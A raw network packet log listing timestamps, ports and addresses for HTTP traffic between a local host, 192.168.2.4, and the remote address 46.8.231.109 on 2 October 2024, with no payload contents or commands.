Oct 2, 2024 09:41:27.730802059 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730802059 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730802059 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730802059 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730802059 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730802059 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730803967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730842113 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730855942 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730869055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730884075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730897903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730912924 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730917931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730917931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730917931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730917931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730917931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730917931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730926991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730942011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730956078 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730956078 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730956078 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730978966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730993032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731007099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731021881 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731039047 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731053114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731066942 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731066942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731066942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731066942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731066942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731066942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731067896 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731081009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731095076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731108904 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731108904 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731108904 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731111050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731126070 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731129885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731129885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731141090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731154919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731169939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731184006 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731198072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731209993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731209993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731209993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731209993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731209993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731211901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731226921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731241941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731256008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731271029 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.731352091 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731352091 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731352091 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731352091 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.731379032 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733510971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733535051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733549118 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733562946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733576059 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733577967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733592987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733607054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733620882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733637094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733650923 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733664989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733669996 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733669996 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733669996 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733669996 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733669996 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733680010 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733695030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733709097 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733724117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733737946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733752012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733760118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733760118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733760118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733760118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733760118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733760118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733767033 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733782053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733797073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733810902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733831882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733848095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733848095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733848095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733848095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733848095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733848095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.733855009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733870029 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733892918 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733906984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733922005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733936071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733949900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733964920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733978987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.733993053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734002113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734002113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734002113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734002113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734002113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734002113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734008074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734023094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734038115 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734051943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734066010 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734081030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734092951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734092951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734092951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734092951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734092951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734092951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734096050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734117031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734117031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734155893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734170914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734184980 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734200001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734215021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734229088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734245062 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734258890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734273911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734280109 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734280109 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734280109 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734280109 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734280109 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734287977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734302998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734318018 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734332085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734348059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734363079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734371901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734371901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734371901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734373093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734373093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734373093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734379053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734394073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734407902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734421968 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734436035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734450102 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734453917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734453917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734453917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734453917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734453917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734453917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734464884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734479904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734493971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734508038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734523058 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734536886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734541893 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734541893 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734541893 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734541893 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734541893 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734541893 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734560013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734574080 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734587908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734608889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734625101 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734639883 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734653950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734662056 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734663010 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734663010 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734663010 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734663010 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734663010 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734668016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734683037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734695911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734710932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734724998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734740019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734746933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734746933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734746933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734746933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734747887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734747887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734755039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734771013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734785080 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734800100 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734814882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734819889 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734821081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734821081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734821081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734821081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734828949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734843969 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734858036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734872103 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734888077 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734903097 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734916925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.734919071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734919071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734919071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734920025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734920025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734920025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.734932899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735008001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735022068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735035896 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735050917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735064983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735075951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735075951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735075951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735075951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735075951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735075951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735080004 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735095024 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735110998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735125065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735125065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735135078 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735137939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735152006 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735166073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735179901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735200882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735214949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735229015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735244036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735244989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735244989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735244989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735244989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735244989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735244989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735258102 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735272884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735287905 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.735410929 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735410929 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735410929 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735410929 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.735411882 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736247063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736341953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736356020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736370087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736385107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736398935 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736416101 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736438036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736450911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736465931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736465931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736465931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736466885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736465931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736465931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736481905 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736496925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736509085 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736509085 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736509085 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736510992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736548901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736562967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736614943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736629009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736643076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736658096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736664057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736664057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736664057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736664057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736664057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736723900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736737967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736752033 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736768007 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736799955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736799955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736799955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736799955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736799955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736800909 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736844063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736857891 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736871958 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736895084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736908913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736922979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736938000 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.736946106 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736946106 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736946106 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.736946106 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737015009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737015009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737083912 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737098932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737112999 CEST	80	49749	46.8.231.109	192.168.2.4
